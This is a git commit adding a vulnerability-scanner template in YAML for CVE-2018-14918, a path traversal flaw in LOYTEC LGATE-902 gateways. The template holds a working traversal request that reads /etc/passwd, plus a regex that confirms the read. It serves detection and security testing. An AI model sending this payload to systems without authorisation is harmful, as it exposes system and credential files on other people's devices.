Create CVE-2018-14918.yaml
parent
4f394a940f
commit
5f3650aa5b
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2018-14918
|
||||
|
||||
info:
|
||||
name: LOYTEC LGATE-902 6.3.2 - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: The path traversal (CVE-2018-14918) and file deletion (CVE-2018-14916) vulnerabilities allow an attacker to manipulate path references and access or delete files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read or delete system and configuration files containing, e.g., usernames and passwords.
|
||||
reference:
|
||||
- https://seclists.org/fulldisclosure/2019/Apr/12
|
||||
- https://www.cvedetails.com/cve/CVE-2018-14918/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2018-14918
|
||||
cwe-id: CWE-22
|
||||
tags: lgate,cve2018,loytec,lfi,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
Loading…
Reference in New Issue